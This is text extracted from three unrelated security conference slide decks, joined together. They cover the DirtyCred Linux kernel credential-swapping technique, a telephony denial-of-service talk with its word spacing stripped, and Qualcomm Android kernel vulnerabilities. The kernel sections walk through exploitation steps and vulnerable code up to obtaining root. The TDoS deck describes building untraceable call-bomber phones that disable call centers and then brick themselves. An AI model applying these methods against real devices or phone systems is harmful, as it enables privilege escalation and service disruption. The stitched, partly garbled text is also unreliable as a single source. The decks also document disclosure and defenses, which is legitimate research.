#DirtyCred
Zhenpeng Lin
@Markak_
• Partially overwrite the pointer to cause a reference unbalance
credential
object
vuln
object
victim
object
*cred
Pivoting Invalid-Write
victim
object
credential
object
credential
object
*cred
0xff…000
0xff…100
overflow
object
credential
object
credential
object
credential
object
0xff…000
0xff…100
For OOB
For UAF
credential
object
credential
object
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
• Free the credential object when freeing the victim object
Pivoting Invalid-Write
freed
credential
object
credential
object
freed
0xff…000
0xff…100
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Pivoting Invalid-Free
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
• Two references to free the same object
Pivoting Invalid-Free
Freed
Allocated
Allocated
Vuln Obj
ref_a
ref_b
Vulnerable object in kernel memory
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Pivoting Invalid-Free
Freed
Allocated
Allocated
Freed
Step 1. Trigger the vuln, free the vuln object
with one reference
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Pivoting Invalid-Free
Freed
Allocated
Allocated
Freed
Freed memory page
Step 1. Trigger the vuln, free the vuln object
with one reference
Step 2. Free the object in the memory cache
to free the memory page
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Pivoting Invalid-Free
Freed
Allocated
Allocated
Freed
Freed memory page
Credentials Credentials
Credentials
Credentials
Step 1. Trigger the vuln, free the vuln object
with one reference
Step 2. Free the object in the memory cache
to free the memory page
Step 3. Allocate credentials to reclaim the
freed memory page (Cross Cache Attack)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Pivoting Invalid-Free
Freed
Allocated
Allocated
Freed
Freed memory page
Credentials Credentials
Credentials
Freed
Credentials
Credentials Credentials
Credentials
Credentials
Step 1. Trigger the vuln, free the vuln object
with one reference
Step 2. Free the object in the memory cache
to free the memory page
Step 3. Allocate credentials to reclaim the
freed memory page (Cross Cache Attack)
Step 4. Free the credentials with the left
dangling reference
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Three Challenges
1. How to free credentials.
2. How to allocate privileged credentials as unprivileged users.
(attacking task credentials)
3. How to stabilize file exploitation. (attacking open file
credentials)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Challenge 2: Allocating Privileged Task Credentials
• Unprivileged users come with unprivileged task credentials
• Waiting privileged users to allocate task credentials
influences the success rate
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Challenge 2: Allocating Privileged Task Credentials
• Solution I: Trigger Privileged Userspace Process
• Executables with root SUID (e.g. su, mount)
• Daemons running as root (e.g. sshd)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Challenge 2: Allocating Privileged Task Credentials
• Solution I: Trigger Privileged Userspace Process
• Executables with root SUID (e.g. su, mount)
• Daemons running as root (e.g. sshd)
• Solution II: Trigger Privileged Kernel Thread
• Kernel Workqueue — spawn new workers
• Usermode helper — load kernel modules from userspace
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Three Challenges
1. How to free credentials.
2. How to allocate privileged credentials as unprivileged users.
(attacking task credentials)
3. How to stabilize file exploitation. (attacking open file
credentials)
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
~/dummy
• The swap of file object happens before permission check
/etc/
passwd
Challenge 3: Stabilizing File Exploitation
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
close(fd);
f_op
f_cred
Write to /etc/
passwd failed
check perm
f_mode
O_RDONLY
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
• The swap of file object happens after file write.
Challenge 3: Stabilizing File Exploitation
~/dummy
f_mode
O_RDWR
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
close(fd);
f_op
f_cred
Write to ~/
dummy
check perm
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
• The swap of file object should happen between permission
check and actual file write
• The desired time window is small
Challenge 3: Stabilizing File Exploitation
~/dummy
f_mode
O_RDWR
int fd = open(“~/dummy”, O_RDWR);
write(fd, “HACKED”, 6);
close(fd);
f_op
f_cred
Write to /etc/
passwd
Time window of swapping file
check perm
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Challenge 3: Stabilizing File Exploitation
• Solution I: Extend with Userfaultfd or FUSE
• Pause kernel execution when accessing userspace memory
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Solution I: Userfaultfd & FUSE
• Pause at import_iovec before v4.13
• import_iovec copies userspace memory
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Solution I: Userfaultfd & FUSE
• Pause at import_iovec before v4.13
• import_iovec copies userspace memory
• Used in Jann Horn’s exploitation for CVE-2016-4557
• Dead after v4.13
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Solution I: Userfaultfd & FUSE
• vfs_writev after v4.13
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Solution I: Userfaultfd & FUSE
• Pause at generic_perform_write
• prefaults user pages
• Pauses kernel execution at the
page fault
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Challenge 3: Stabilizing File Exploitation
• Solution I: Extend with Userfaultfd & FUSE
• Pause kernel execution when accessing userspace memory
• Userfaultfd & FUSE might not be available
• Solution II: Extend with file lock
• Pause kernel execution with lock
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
• A lock of the inode of the file
• Lock the file when it is being writing to
Solution II: File Lock
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Solution II: File Lock
Thread A
Thread B
check perm
Lock
Unlock
Do the write
check perm
Lock
Unlock
Do the write
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Solution II: File Lock
check perm
Lock
Unlock
Do the write
(write 4GB)
check perm
Lock
Unlock
Do the write
Thread A
Thread B
A large time window
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Demo Time!
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
CVE-2021-4154
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Centos 8 and Ubuntu 20
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Android Kernel with CFI enabled*
* access check removed for demonstration
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Advantages of DirtyCred
• A generic method
• The method applies to container and Android.
• Simple but powerful
• No need to deal with KASLR, CFI.
• Data-only method.
• Exploitation friendly
• Make your exploit universal!
• empowers different bugs to be Dirty-Pipe-liked (sometimes even better).
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Defense Against DirtyCred
• Fundamental problem
• Object isolation is based on type not privilege
• Solution
• Isolate privileged credentials from unprivileged ones
• Where to isolate?
• Virtual memory (using vmalloc): No cross cache attack anymore!
• Code is available at https://github.com/markakd/DirtyCred
#BHUSA @BlackHatEvents
#DirtyCred
Zhenpeng Lin
@Markak_
Takeaways
• New exploitation concept — DirtyCred: swapping credentials
• Principled approach to different challenges
• Universal exploits to different kernels
• Effective defense
Zhenpeng Lin (@Markak_)
https://zplin.me
[email protected]
Pic comes from @sirdarckcat | pdf |
EasyTousePDDOS
:BurnerPhoneDDOS2Dollarsaday:70CallsaMin
WestonHeckerSecurityExpert
SystemsNetwork
Analyst/Penetrations
Tester/PresidentOfComputer
SecurityAssociationOf
NorthDakota
A1
Slide 1
A1
Author, 9/16/2013
WhoamIwhatisthistalkabout,
• AboutMe:PenetrationTester,ComputerScience/Geophysics,TonsofCerts,Customexploits
writtenforPMSHotelSoftware,Twowayreservationfuzzing,madeenclosureforteensy3.0
thatlookslikeiPhoneforPentesting,RFIDScannerthatmountsunderchair.
• About9yearsofREALpentesting,DisasterRecovery,SecurityResearch
• NERC,FFIEC,ISO,GLBAandFDIC,ComplianceauditsHIPPA,Omnibus,
• WrotecustomexploitsandscriptsforobscureInternetserviceprovidergear,
• Toolsofthetrade“FleetofFakeIphones”.
• ThecreationofaPhoneCallBomberfromyourGrama’s prepaidphonetoasolarpowered
hackertoolhiddeninlightfixtureatapubliclibrary.
• Screenshotdemonstrationof15PhonesTakingdowna200PersonCallcenter.
• DistributedDenialofservicePhoneSystems“Whatitishowitsused”“HowitEffects
Businesses”
• Alternateusesoncephonehasbeenflashedintoattackplatform.
FleetofFakeIphonesWithTeensy3.0
RFIDBadgeReaderScansThroughSeat
WhereCustomersWalletWouldBe.
DDOSwhatisitTDoS Whatitis?
Howdotheydiffer?
• (DDoS)attack isanattempttomakeamachineor
networkresourceunavailabletoitsintendedusers.
Althoughthemeanstocarryout,motivesfor,and
targetsofaDoS attackmayvary,itgenerallyconsists
ofeffortstotemporarilyorindefinitelyinterruptor
suspendservicesofahostconnectedtotheInternet.
• TelephonyDenialofServiceorTDoS isafloodof
unwanted,maliciousinboundcalls.Thecallsare
usuallyintoacontactcenterorotherpartofan
enterprise,whichdependsheavilyonvoiceservice.
CurrentmethodsofTDOShowithas
evolved
• (SIPTrunk)SIPtrunking isaVoiceoverInternetProtocol(VoIP)
andstreamingmediaservicebasedontheSessionInitiation
Protocol(SIP)bywhichInternettelephonyserviceproviders
(ITSPs)delivertelephoneservicesandunifiedcommunicationsto
customersequippedwithSIPbasedprivatebranchexchange(IP
PBX)andUnifiedCommunicationsfacilities.
• (PRI)ThePrimaryRateInterface(PRI)isastandardized
telecommunicationsservicelevelwithintheIntegratedServices
DigitalNetwork(ISDN)specificationforcarryingmultipleDS0
voiceanddatatransmissionsbetweenanetworkandauser.line
consistsof24channels,1forDatacallerIDinformation.
• InthewildtherearealotofTDOSinconjunctionwithcreditcard
andbankfraud.
CurrentMethodsofTDOS
CallerIDSpoofReflectionAttack
Malwareonphonesandcallmanagementsoftware
Scripttoloadcallerinformationontorealtorwebpage
HijackedPRIandSIPServicesWarDialing
CallerIDreflectionattack
Legitimatephoneservicewith
spoofedcallerIDinformation
Thousandsofcallsreturnedtothe
numberthattheybelievecalledthem
Realtorpagesusethesamescripts
forinquiriesgenerationofalist.
Pagewithgenerictemplates.
Inputfieldsautomaticallyfilledin.
Inputforscript,listofURLSand
informationoffofinputfield.
Listof4500+pagesthatareautopopulated.
WebscriptsBots
76%ofRealtorWebpagesusethe
samescriptsdon’tusecaptchas
Scriptpoststo4600+realtorpages
in2hrs.
Botnetsofinfectedsmartphones
Justlikecomputerssmartphones
havebecomeaplatformforbotnets.
Increasein“rooted”phonesopens
doorstosecurityrisks.
ExplanationofhowIdevelopeda
OEM/Weaponized cellphoneplatform
PrepaidCellPhonesRunningBrew3.1
OperatingSystemsCDMA1X800/1900mHz
DigitalOnlySamsungU365akaGusto2
Qsc6055192mhzprocessor, Weaponized platform
Worksonallvaluetierqualcomm qsc60XX.
Thedevelopereditionsofthesemodelssupport
bootloader unlocking,allowingtheuserto
voluntarilyvoidthemanufacturerwarrantytoallow
installationofcustomkernelsandsystemimagesnot
signedbyauthorizedparties.However,theconsumer
editionsshipwithalockedbootloader,preventing
thesetypesofmodifications.Untilnow
Qsc6055192mhzprocessor,Comes withSecure
Boot,SEE,SFS
Noapplicationprocessorveryeasy
securitytobypass.(Explained)
GreatEasyDevelopmentSoftware.
WritteninC+
BREWprovidestheabilitytocontrolannunciators
(typicallylocatedatthetopofthedisplay—RSSI,
battery,voicemail,etc.);theactivationor
deactivationofannunciatorsbyBREWapplications.
Thiscapabilityshallbeprovidedbydefaultifthe
UIisrunsontopofBREW. TheOEMshallprovidethe
capabilitytoprogramvaluesforthesetofBREW
configurationparametersusingtheProductSupport
Tool(PST).
ExploitInIRingerMgr allowsfor
interactionwithclamandspeaker
manipulationsuchaspickingup
Callinsteadofplayingringtone
BREWprovidestheIRingerMgr
interfacethatallowsanOEMto
integratetheirnativeringer
applicationwithBREW.ThisenablesBREW
applicationdeveloperstodownloadringersand
manageringersonthedevice.IRingerMgr allows
assigningofringersfromaBREWapplicationtobe
activeandutilizedforincomingcalls(particular
categories).
Clamtypephonesrefertoall
handsetsonwhichpartsofthe
handsetcanbefoldedorrotated
tocoverthemainLCDorthe
keypad.Onthesedevices,some
applicationssuchasmultimedia
applicationsforexample,may
needtoaltertheirfunctionaluseofhardwareor
servicesprovidedbythedevicedependingupon
eventsgeneratedbytheactionoftheuser.
Secondarydisplay:Fordevicessupportinga
secondarydisplay,thedisplayshallbemade
availabletoapplicationsrequiringdisplay
serviceswhentheclamisclosed.
Modifiedexecutableallowsforthesoftwaretobe
pushedtothedevicebypassingsecurityfeature
easilyusingaloopholeswiththecertificate
expirationprocess.
Thiserrorisexploitedbyrunning
modifiedexecutablewhileotherdeviceis
installedwithavalidsigheddriver.
OncethedriverisupdatedonthePCthis
allowsfullattacksurfacesupport.
Driversanddeviceinformationare
supportedbyanowexpiredcertificate.
Certificateexpiredin2012alongwith
interactionwithdevicetobypass
securityfeaturesets.
Modifieddriverfilesallowmodifications
ofalldeviceinformation.
PRLpreferredroaminglistarepulledfromthedevice
activityyoucansetjumptimeofthePRLlistand
turnofforlochtheGPSpositionofthedevice
makingitpracticallyuntraceable.
Devicedevelopmentplatformyoucandevelop
applicationsfortheattackplatform.Byemulating
thesoftwareoncustomwrittenplatformemulators
providedforOEMdevelopers
FullplatformforemulationofU365device
Testingyourapplicationswithouthavingto
loadthemonthedeviceEffectivelymakingit
adevelopmenthandsetattackplatform
Nowthatyouhaveyourownfully
unlockedplatformwhatnow….
OEMDevelopmentPlatform
Weaponized DevelopmentPlatform
Withattackplatformloadedonthephone
youhavefullcontrolofalldeviceson
thephoneincludingTDOS,Brickmode etc.
Settingupringtonesasyour
specificpayloads.
Settingringtoneswilltriggerthemalformed
ringtonesprocessesontheeventsthattriggerthem.
CheeseBox?HistoryEvolution
Callonephonenumberthecallispassedoffvia
Bluetoothtosecondphonecallsyourrealnumber
untraceablephoneproxy
BluetoothConnectedWeaponized Phone
calls3timesinarowandrecordsthe3rd
callthatisstraittovoicemailtoan
MP3ondesktop
FilescreatedwithBluetoothconnection
OutputofS2Textfiles
RunMP3threwSpeechtotextOPENsourcesoftware
Noneedtocallintoprogramphone
scriptwillcallinandusetheinput
informationfromthelistbelow.
ThisPrepaidCellPhoneCanDeny
LegitimatePhoneCallsfor5DaysStrait
• AnonymousPurchase
• 2DollarsDaysThatitisUsed
• UntraceableCanbeChargedWith
SolarUSBChargerPRLListHopping.
• GPSNotRecoverableUnlessin911
Modewhichcaneasilybeturnedoff
ifyouflashphonebeforeactivation.
ThiskitshownhereIbuiltfor21
dollarstotal.
• Prepaidphone16$
• SolarUSBcharger5$
• 2DollarsDaysThatitisUsed
• UntraceableCanbeChargedWith
SolarUSBChargerPRLListHopping.
• *228bypassedtolockinPRLhoplist
andlockGPSstatis .
• Stablenonstopcallingfor5days
strait
• AlarmsetsphonetoBrickon5th day
withmalformedringtone.
PhoneBeingturnedintoCALLBOMBER
PluggedintoComputerFirmware
andPRLBeingUpdated
PluggedintoLaptopandReflashed
inunder8min.
CrashingofcallsoftwarebyTDOS
Launchingof10phoneswith
weaponized platform
CPUandramutilizationcrashescall
centerVM
ThanksForInvitingMeandForYourTime
AnyQuestionsFeelFreetoContactMe.
[email protected]
Westonhecker@twitter
PhoneNumber701…NeverMind | pdf |
Adam Donenfeld
•
Android chipsets overview in ecosystem
•
Qualcomm chipset subsystem’s overview
•
New kernel vulnerabilities
•
Exploitation of a new kernel vulnerability
•
Conclusions
ADAM DONENFELD
• Years of experience in research (both PC and mobile)
• Vulnerability assessment
• Vulnerability exploitation
• Senior security researcher at Check Point
• In meiner Freizeit, lerne ich Deutsch gern
Special thanks to Avi Bashan, Daniel Brodie and Pavel Berengoltz for helping with the research
OEM
Chipset code
Android Open Source Project
Linux Kernel
Qualcomm
IPC Router
GPU
Thermal
QSEECOM
Performance
Audio
Ashmem
IPC
Router
GPU
Thermal
Performance
CVE-2016-5340
• Ashmem – Android’s propriety memory allocation
subsystem
• Qualcomm devices uses a modified version
– Simplifies access to ashmem by Qualcomm modules
int get_ashmem_file(int fd,
struct file **filp,
struct file **vm_file,
unsigned long *len)
{
int ret = -1;
struct ashmem_area *asma;
struct file *file = fget(fd);
if (is_ashmem_file(file)) {
asma = file->private_data;
*filp = file;
*vm_file = asma->file;
*len = asma->size;
ret = 0;
} else {
fput(file);
}
return ret;
}
Is our fd an ashmem
file descriptor?
CVE-2016-5340
• Obtain a file struct from file descriptor
• Compare file operation handlers to expected
handler struct
– If it matches file type is valid
static int is_ashmem_file(struct file *file)
{
char fname[256], *name;
name = dentry_path(file->f_dentry, fname, 256);
return strcmp(name, "/ashmem") ? 0 : 1; /* Oh my god */
}
CVE-2016-5340
• Exploitation requires –
– Creation of file named “ashmem” on
root mount point (“/”)
• / is read-only
CVE-2016-5340
• Opaque Binary Blob
– APK Expansion File
– Support APKs > 100MB
– Deprecated (still works!)
• A mountable file system
CVE-2016-5340
• Create an OBB
• Create “ashmem” in it’s root directory
• Mount the OBB
• Map “ashmem” memory to the GPU
– Pass a fd to the fake ashmem file
Ashmem
IPC
Router
GPU
Thermal
Performance
CVE-2016-2059
• Qualcomm’s IPC router
• Special socket family
– AF_MSM_IPC (27)
• Unique features
– Whitelist specific endpoints
– Everyone gets an “address” for communication
– Creation/destruction can be monitored by anyone
• Requires no permission
• AF_MSM_IPC socket types
– CLIENT_PORT
– CONTROL_PORT
– IRSC_PORT
– SERVER_PORT
• Each new socket is a CLIENT_PORT socket
CVE-2016-2059
static int msm_ipc_router_ioctl(
struct socket *sock,
unsigned int cmd,
unsigned long arg)
{
struct sock *sk = sock->sk;
struct msm_ipc_port *port_ptr;
lock_sock(sk);
port_ptr = msm_ipc_sk_port(sock->sk);
switch (cmd) {
....
case IPC_ROUTER_IOCTL_BIND_CONTROL_PORT:
msm_ipc_router_bind_control_port(
port_ptr)
....
}
release_sock(sk);
....
}
int msm_ipc_router_bind_control_port(
struct msm_ipc_port *port_ptr)
{
if (!port_ptr)
return -EINVAL;
down_write(&local_ports_lock_lhc2);
list_del(&port_ptr->list);
up_write(&local_ports_lock_lhc2);
down_write(&control_ports_lock_lha5);
list_add_tail(&port_ptr->list, &control_ports);
up_write(&control_ports_lock_lha5);
return 0;
}
Client list
Control list
down_write(&local_ports_lock_lhc2);
list_del(&port_ptr->list);
up_write(&local_ports_lock_lhc2);
down_write(&control_ports_lock_lha5);
list_add_tail(&port_ptr->list, &control_ports);
up_write(&control_ports_lock_lha5);
down_write(&local_ports_lock_lhc2);
list_del(&port_ptr->list);
up_write(&local_ports_lock_lhc2);
down_write(&control_ports_lock_lha5);
list_add_tail(&port_ptr->list, &control_ports);
up_write(&control_ports_lock_lha5);
Client list
Control list
CVE-2016-2059
• control_ports list is modified without a lock
• Deleting 2 objects from control_ports simultaneously!
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = A
next = B
prev = control_ports
B->prev = control_ports
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = A
next = B
prev = control_ports
B->prev = control_ports
Qualaroot - implementation
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = B
next = C
prev = control_ports
C->prev = control_ports
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = B
next = C
prev = control_ports
C->prev = control_ports
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = B
next = C
prev = control_ports
control_ports->next = C
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = B
next = C
prev = control_ports
control_ports->next = C
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = B
next = C
prev = control_ports
B->prev = B->next = POISON
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = B
next = C
prev = control_ports
B->prev = B->next = POISON
Qualaroot - implementation
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = A
next = B
prev = control_ports
control_ports->next = B
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = A
next = B
prev = control_ports
control_ports->next = B
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = A
next = B
prev = control_ports
A->prev = A->next = POISON
static inline void list_del(
struct list_head * entry)
{
next = entry->next;
prev = entry->prev
next->prev = prev;
prev->next = next;
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
B
A
control_ports
C
LIST_POISON
entry = A
next = B
prev = control_ports
A->prev = A->next = POISON
• Two following objects are deleted
– Simultaneously!
• control_ports points to a FREE data
– LIST_POISON worked – No longer mappable
– Spraying af_unix_dgram works
• Iterations on control_ports?
– Just close a client_port!
– Notification to all control_ports with
post_pkt_to_port
static int post_pkt_to_port(struct msm_ipc_port *UAF_OBJECT,
struct rr_packet *pkt, int clone)
{
struct rr_packet *temp_pkt = pkt;
void (*notify)(unsigned event, void *oob_data,
size_t oob_data_len, void *priv);
void (*data_ready)(struct sock *sk, int bytes) = NULL;
struct sock *sk;
mutex_lock(&UAF_OBJECT->port_rx_q_lock_lhc3);
__pm_stay_awake(UAF_OBJECT->port_rx_ws);
list_add_tail(&temp_pkt->list, &UAF_OBJECT->port_rx_q);
wake_up(&UAF_OBJECT->port_rx_wait_q);
notify = UAF_OBJECT->notify;
sk = (struct sock *)UAF_OBJECT->endpoint;
if (sk) {
read_lock(&sk->sk_callback_lock);
data_ready = sk->sk_data_ready;
read_unlock(&sk->sk_callback_lock);
}
mutex_unlock(&UAF_OBJECT->port_rx_q_lock_lhc3);
if (notify)
notify(pkt->hdr.type, NULL, 0, UAF_OBJECT->priv);
else if (sk && data_ready)
data_ready(sk, pkt->hdr.size);
return 0;
}
• wake_up function
– Macros to __wake_up_common
static void __wake_up_common(
wait_queue_head_t *q
.......)
{
wait_queue_t *curr, *next;
list_for_each_entry_safe(curr, next,
&q->task_list, task_list) {
...
if (curr->func(curr, mode,
wake_flags, key))
break;
}
}
• wake_up function
– Macros to __wake_up_common
• New primitive!
– A call to function with first controllable param
• Not good enough for commit_creds
• Upgrade primitives
• Find a function that can call an arbitrary
function with address-controlled parameters
• usb_read_done_work_fn receives a function pointer
and a function argument
static void usb_read_done_work_fn(
struct work_struct *work)
{
struct diag_request *req = NULL;
struct diag_usb_info *ch = container_of(
work, struct diag_usb_info,
read_done_work);
...
req = ch->read_ptr;
...
ch->ops->read_done(req->buf,
req->actual,
ch->ctxt);
}
• Chaining function calls –
__wake_up_common usb_read_done_work_fn any function
static void __wake_up_common(
wait_queue_head_t *q
.......)
{
wait_queue_t *curr, *next;
list_for_each_entry_safe(curr, next,
&q->task_list, task_list) {
...
if (curr->func(curr, mode,
wake_flags, key))
break;
}
}
Create UAF situation using the vulnerability
Spray unix_dgrams to catch the UAF
UAF
LIST_POISON
Trigger list iteration
UAF
LIST_POISON
Sprayed
Spray unix_dgrams to catch the UAF
__wake_up_common
UAF->port_rx_wait_q->task_list
usb_read_work_done_fn
usb_read_work_done_fn
usb_read_work_done_fn
qdisc_list_del
enforcing_setup
commit_creds
control_ports is empty
SELinux is permissive
UID=0
cap=CAP_FULL_SET
Qualaroot
Ashmem
IPC
Router
GPU
Thermal
Performance
• ID to pointer translation service
• Handle to kernel objects from user mode
without using pointers
User Mode
Kernel Mode
Create Object Request
Return Safe ID
IDR mechanism
0xFF6DE000
1
1
create_object()
CVE-2016-2503
• SyncSource objects
– Used to synchronize activity between the GPU
and the application
• Can be created using IOCTLs to the GPU
– IOCTL_KGSL_SYNCSOURCE_CREATE
– IOCTL_KGSL_SYNCSOURCE_DESTROY
• Referenced with the IDR mechanism
1
2
1
0
long kgsl_ioctl_syncsource_destroy(
struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
struct kgsl_syncsource_destroy *param = data;
struct kgsl_syncsource *syncsource = NULL;
syncsource = kgsl_syncsource_get(
dev_priv->process_priv,
param->id);
if (!syncsource)
goto done;
/* put reference from syncsource creation */
kgsl_syncsource_put(syncsource);
/* put reference from getting the syncsource above */
kgsl_syncsource_put(syncsource);
done:
return 0;
long kgsl_ioctl_syncsource_destroy(
struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
struct kgsl_syncsource_destroy *param = data;
struct kgsl_syncsource *syncsource = NULL;
syncsource = kgsl_syncsource_get(
dev_priv->process_priv,
param->id);
if (!syncsource)
goto done;
/* put reference from syncsource creation */
kgsl_syncsource_put(syncsource);
/* put reference from getting the syncsource above */
kgsl_syncsource_put(syncsource);
done:
return 0;
Any “pending free” check here?
Thread A
CVE-2016-2503
Thread B
REFCOUNT == 2
REFCOUNT == 1
REFCOUNT == 0
REFCOUNT == 0
REFCOUNT == -1
syncsource = kgsl_syncsource_get(id);
…
…
kgsl_syncsource_put(syncsource);
…
…
kgsl_syncsource_put(syncsource);
free, sprayable data
syncsource = kgsl_syncsource_get(id);
…
…
kgsl_syncsource_put(syncsource);
…
…
kgsl_syncsource_put(syncsource);
CVE-2016-2503
• Create a syncsource object
– A predictable IDR number is allocated
• Create 2 threads constantly destroying the same
IDR number
• Ref-count will be reduced to -1
– Right after getting to zero, object can be sprayed
Use After Free
Ashmem
IPC
Router
GPU
Thermal
Performance
CVE-2016-2504
• GPU main module (kgsl-3d0)
• Map user memory to the GPU
– IOCTL_KGSL_MAP_USER_MEM
– IOCTL_KGSL_GPUMEM_FREE_ID
• Referenced by a predictable ID
– IDR mechanism
long kgsl_ioctl_gpumem_free_id(
struct kgsl_device_private *dev_priv,
unsigned int cmd, void *data)
{
struct kgsl_gpumem_free_id *param = data;
struct kgsl_mem_entry *entry = NULL;
entry = kgsl_sharedmem_find_id(private,
param->id);
if (!entry) {
return -EINVAL;
}
return _sharedmem_free_entry(entry);
}
static long _sharedmem_free_entry(
struct kgsl_mem_entry *entry)
{
bool should_free = atomic_compare_exchange(
entry->pending_free,
0, /* if pending_free == 0 */
1); /* then set pending_free = 1 */
kgsl_mem_entry_put(entry);
if(should_free)
kgsl_mem_entry_put(entry);
return 0;
}
static int
kgsl_mem_entry_attach_process(
struct kgsl_mem_entry *entry,
struct kgsl_device_private *dev_priv)
{
id = idr_alloc(&process->mem_idr,
entry, 1, 0, GFP_NOWAIT);
...
ret = kgsl_mem_entry_track_gpuaddr(
process, entry);
...
ret = kgsl_mmu_map(pagetable,
&entry->memdesc);
if (ret)
kgsl_mem_entry_detach_process(entry);
return ret;
}
CVE-2016-2504
1
2
3
4
5
6
6
entry = kgsl_mem_entry_create();
…
…
id = idr_alloc(…, entry, …);
…
…
initialize_entry(entry);
entry = kgsl_sharedmem_find_id(id);
…
…
if(!entry)
return –EINVAL;
…
…
_sharedmem_safe_free_entry(entry);
IDR items
Thread B - releaser
Thread A - allocator
Thread B - releaser
CVE-2016-2504
Thread A - allocator
1
2
3
4
5
6
free, sprayable data
IDR items
entry = kgsl_sharedmem_find_id(id);
…
…
if(!entry)
return –EINVAL;
…
…
_sharedmem_safe_free_entry(entry);
entry = kgsl_mem_entry_create();
…
…
id = idr_alloc(…, entry, …);
…
…
initialize_entry(entry);
CVE-2016-2504
• Map memory
• Save the IDR
– Always get the first free IDR – predictable
• Another thread frees the IDR
– Before the first thread returns from the IOCTL
UAF in kgsl_mem_entry_attach_process on ‘entry’ parameter
Syncockaroot (CVE-2016-2503)
4th April, 2016
Vulnerability disclosure to
Qualcomm
2nd May, 2016
Qualcomm confirmed the
vulnerability
6th July, 2016
Qualcomm released a public
patch
6th July
Google deployed the patch to
their Android devices
Kangaroot (CVE-2016-2504)
4th April, 2016
Vulnerability disclosure to
Qualcomm
2nd May, 2016
Qualcomm confirmed the
vulnerability
6th July, 2016
